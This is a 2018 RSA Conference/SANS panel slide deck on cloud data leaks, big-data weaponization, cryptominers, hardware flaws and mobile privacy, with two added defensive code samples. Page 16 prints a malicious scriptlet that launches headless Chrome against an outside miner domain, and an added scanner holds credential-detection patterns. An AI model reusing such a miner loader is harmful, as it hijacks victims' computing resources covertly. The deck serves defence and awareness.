The Five Most Dangerous New Attack Techniques, and What’s to Come (December 5, 2018). Moderator: Alan Paller. Speakers: Ed Skoudis, Johannes Ullrich, Heather Mahalik.
Page 1

The Five Most Dangerous New Attack Techniques, and What’s to Come
December 5, 2018

Moderator: Alan Paller

Speakers: Ed Skoudis, Johannes Ullrich, Heather Mahalik

Page 2

© 2018 RSA Conference. All rights reserved.

About This Session

• An update on topics introduced during the keynote panel discussion at RSA Conference

• Please ask questions for our panelists for the Q&A section after the initial brief presentations


Page 3

Cloud Data Repository Breaches and Weaponization of Big Data

Ed Skoudis
SANS Faculty Fellow and Pen Test Curriculum Lead
Director, SANS NetWars, CyberCity, and STX Projects

Page 4


Repositories and Cloud Storage Data Leakage

• Software is built in a different way today
• Cloud-based collaboration, code repositories, and data storage
• GitHub, Amazon AWS/S3, Google Cloud Platform, Microsoft Azure, Docker Hub, etc.
• Private repositories accidentally marked public
• Public repositories with sensitive data in them (keys and passwords)
• Code and data put in the wrong repository

Page 5


What You Can Do

• Data asset inventory
• Data curator
• Educate architects and developers
• Prevent developers from committing code with leaked creds:
  • git-seekret
  • git-secrets
• Search for sensitive information in repositories:
  • gitrob
• Review access logs associated with your assets
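The pre-commit check the slide recommends, as an added example (not code from the panel or from git-secrets/git-seekret): it scans only the added lines of a staged diff for the credential shapes that leak into repositories (AWS key IDs and secrets, private-key blocks, hard-coded passwords). The regexes and the sample diff are constructed for this example; the key values in the sample are AWS's documented placeholder keys.

```python
import re
import sys

# Regexes for the credential types the slide's tools hunt for. These patterns
# are constructed for this example, not taken from git-secrets or git-seekret.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "aws_secret_access_key": re.compile(
        r"(?i)aws.{0,20}?secret.{0,20}?['\"][0-9a-zA-Z/+]{40}['\"]"),
    "private_key_block": re.compile(
        r"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"),
    "generic_password": re.compile(r"(?i)password\s*[=:]\s*['\"][^'\"]{8,}['\"]"),
}

def scan_added_lines(diff_text: str) -> list[tuple[str, int, str]]:
    """Scan only the '+' lines of a unified diff (what a pre-commit hook sees
    from `git diff --cached`) and return (file, new_line_no, pattern) findings."""
    findings = []
    current_file, new_line_no = None, 0
    for raw in diff_text.splitlines():
        if raw.startswith("+++ "):
            current_file = raw[4:].removeprefix("b/")   # file on the new side
        elif raw.startswith("@@"):
            m = re.search(r"\+(\d+)", raw)               # new-side start line
            new_line_no = int(m.group(1)) - 1 if m else 0
        elif raw.startswith("+"):
            new_line_no += 1
            for name, pat in SECRET_PATTERNS.items():
                if pat.search(raw[1:]):
                    findings.append((current_file, new_line_no, name))
        elif raw.startswith(" "):
            new_line_no += 1                              # unchanged context line
    return findings

# Constructed sample diff: a developer replaces environment lookups with literals.
SAMPLE_DIFF = """\
diff --git a/config/settings.py b/config/settings.py
--- a/config/settings.py
+++ b/config/settings.py
@@ -1,3 +1,5 @@
 import os
-AWS_ACCESS_KEY_ID = os.environ["AWS_ACCESS_KEY_ID"]
+AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
+AWS_SECRET_ACCESS_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
+DB_PASSWORD = "correct-horse-battery"
 REGION = "us-east-1"
"""

if __name__ == "__main__":
    # Hook usage: git diff --cached -U0 | python check_secrets.py
    hits = scan_added_lines(sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_DIFF)
    for path, line, kind in hits:
        print(f"{path}:{line}: possible {kind}")
    sys.exit(1 if hits else 0)
```

A non-zero exit from the hook blocks the commit; the same function run over `git log -p` output gives the repository-wide search the slide attributes to gitrob.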

Page 6


Amazon Macie

• Uses machine learning to discover and classify sensitive data in Amazon S3 buckets

• PII, intellectual property, etc.

• It then uses Amazon CloudWatch to monitor access looking for anomalies

• Price is $5 per GB protected, plus $4 per 100,000 events

Page 7


Microsoft Azure SQL Database Threat Detection

• Uses machine learning to look at cloud-based SQL Server event logs for anomalous activity:
  • Suspicious access
  • Anomalous queries
  • Potential vulnerabilities
  • SQL injection attacks

• Price is $15 per database per month

Page 8


Google’s Data Loss Prevention API

• Looks for over 70 predefined detectors for PII and other sensitive information
• Also looks for context clues
• Supports automated classification of data
• Integrate into your own applications built on Google’s infrastructure
• Complex pricing structure based on inspection units (IUs) and transformation units (TUs)…
  • 10 Giga Units are free
  • …then it’s $0.30 per GU after that

Page 9


Weaponization of Big Data

• It’s not just about getting shell or exfiltrating specific PII for criminal use any more
• Increasingly, it’s about hacking the data itself
  • Disparate sources and correlation
  • De-anonymization and much more
• Are we fighting the last war?
  • No, but a big new front is hugely relevant

Page 10


Tim Cook Comments

"Our own information, from the everyday to the deeply personal, is being weaponized against us with military efficiency."

"We shouldn't sugarcoat the consequences. This is surveillance. And these stockpiles of personal data serve only to enrich the companies that collect them."

International Conference of Data Protection and Privacy Commissioners in Brussels in October 2018

Page 11


Weaponization of Big Data Analytics

• March 2018: Announcement of Cambridge Analytica’s scraping and analysis of Facebook data for the 2016 election
• Oct 2018: Russian firms who build facial recognition software for the Russian government scraped Facebook image data
• 2015: OPM breach of 22 Million government employee and contractors’ data, plus 5.6 Million fingerprints

Page 12


What You Can Do

• Be careful about exposing data, even if it seems innocuous
• Analyze business risks in terms of privacy implications
• Consider how your data could be used with others’ data to undermine your mission
• Learn about Open Source Intelligence (OSINT) and data analytics
  • Holiday Hack Challenge 2017 Naughty and Nice List
  • Holiday Hack Challenge 2018 coming in the next week or two

Page 13

Cryptominer Update
Hardware Vulnerabilities

Johannes B. Ullrich, Ph.D.
Dean of Research, SANS Technology Inst.
Director of Internet Storm Center

Page 14


Cryptocoin Mining – Prices are Dropping

[Chart: price over time, Nov 2017 to Jul 2018, y-axis 0 to 600]

Avg. PC: $10/year (end of 2018)

Page 15


Miners are Improving

• Using less than 100% of CPU
• Private mining pools
• Root kits to evade detection
• Observing user behavior (turn off when system in use)
• Better tailoring to system capabilities

Page 16


Example: Coinmining in Headless Browser

    <registration progid="TESTING" classid="{A1112221-0000-0000-3000-000DA00DABFC}">
      <script language="JScript"><![CDATA[
        var foo = new ActiveXObject("WScript.Shell").Run("chrome.exe --headless --disable-gpu --remote-debugging-port=9222 http://slprmnr.tk/obfus.html");
      ]]></script>
    </registration>
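Detection logic for the launch pattern in the scriptlet above (a browser started headless, with a URL on the command line, under a script host), as an added example that is not part of the panel's material. The event fields mimic Sysmon/EDR process-creation records; both sample events and the miner URL host are constructed placeholders.

```python
import re

BROWSERS = {"chrome.exe", "msedge.exe", "chromium.exe"}
# Script hosts that have no business spawning a browser; the slide's scriptlet
# runs under WScript.Shell, so a browser under one of these is the tell.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "regsvr32.exe", "mshta.exe", "rundll32.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def headless_browser_indicators(event: dict) -> list[str]:
    """Reasons a process-creation event looks like a headless-browser miner
    launch. An empty list means the event is not flagged."""
    if basename(event.get("image", "")) not in BROWSERS:
        return []
    cmd = event.get("command_line", "")
    parent = basename(event.get("parent_image", ""))
    reasons = []
    if "--headless" in cmd:
        reasons.append("headless mode")
    if "--remote-debugging-port" in cmd:
        reasons.append("remote debugging port enabled")
    if URL_RE.search(cmd):
        reasons.append("launched with a URL argument")
    if parent in SCRIPT_HOSTS:
        reasons.append(f"spawned by script host {parent}")
    # Headless alone is normal on CI and developer hosts; require one more signal.
    return reasons if "headless mode" in reasons and len(reasons) >= 2 else []

def flagged_events(events: list[dict]) -> list[int]:
    """Indices of the events that produced at least one indicator."""
    return [i for i, e in enumerate(events) if headless_browser_indicators(e)]

# Constructed sample events; the URL host is a placeholder, not the slide's domain.
SAMPLE_EVENTS = [
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": "chrome.exe --headless --disable-gpu --remote-debugging-port=9222 "
                     "http://miner-host.invalid/obfus.html"},
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": '"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"'},
]

if __name__ == "__main__":
    for i in flagged_events(SAMPLE_EVENTS):
        print(i, headless_browser_indicators(SAMPLE_EVENTS[i]))
```

Tune by allow-listing the parents that legitimately run headless browsers (build agents, test runners) rather than by dropping the headless signal itself.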

Page 17


Return to IoT Mining

• 2014: Litecoin Mining common payload for IoT exploits (e.g. DVRs)
• 2016: Mirai Botnet: Focus shifts to DDoS
• 2018: Coin miners are back (mostly Monero)

Page 18


Hardware Issues Keep Coming

• March 2018: BranchScope
• May 2018: various Spectre variants
• August 2018: L1TF flaws
• Nov 2018: ECC Rowhammer demonstrated (first Feb 2017)

Never mind various BMC (Baseboard Management Controller) issues and SPI flash vulnerabilities

Page 19


Performance Issues / Patches

• Still vastly different numbers
• Some of the patches can add up to substantial losses
• Much depends on workload and operating system optimizations
• Patches delivered via operating system updates, but not available for older systems

Page 20

Data Leakages from Mobile

Heather Mahalik
SANS Senior Instructor
Digital Forensics Expert

Page 21


Privacy: Data Leakages from Smartphones

• Variety of operating systems
• Lacking updates and security features
• Apps, apps, and more apps
• Location tracking
• Cloud…

Mobile devices are one of the easiest platforms for attacks

Page 22


Why the Mobile Device?

• Believe it or not, your phone knows more than you think!
• How attacks happen:
  • Application installs/permissions
  • Malware/Spyware
  • Stealing credentials
  • Cloud

Page 23


Location Tracking

• Maps
• Navigation
• Hiding in application data
• EXIF data
• Health data
• Exercise apps
• Google

Page 24


Just How Much Can Be Leaked?


Page 25


The Social Media Nightmare


Page 26


Ways to Mitigate

• Know what you install
• Read before saying “yes”
• Consider the pros and cons of 2FA
• Use a third-party authenticator
  • Google Authenticator
  • GlobalSign
  • LastPass
  • Microsoft Authenticator

Page 27


Reality of Data Leakages from Mobile

• Great for Law Enforcement
• Awful for us!
• Can 2FA help or does it hurt us?
• If you think this is bad, wait until you see the cloud vulnerabilities and data leakages

Page 28

Open Q&A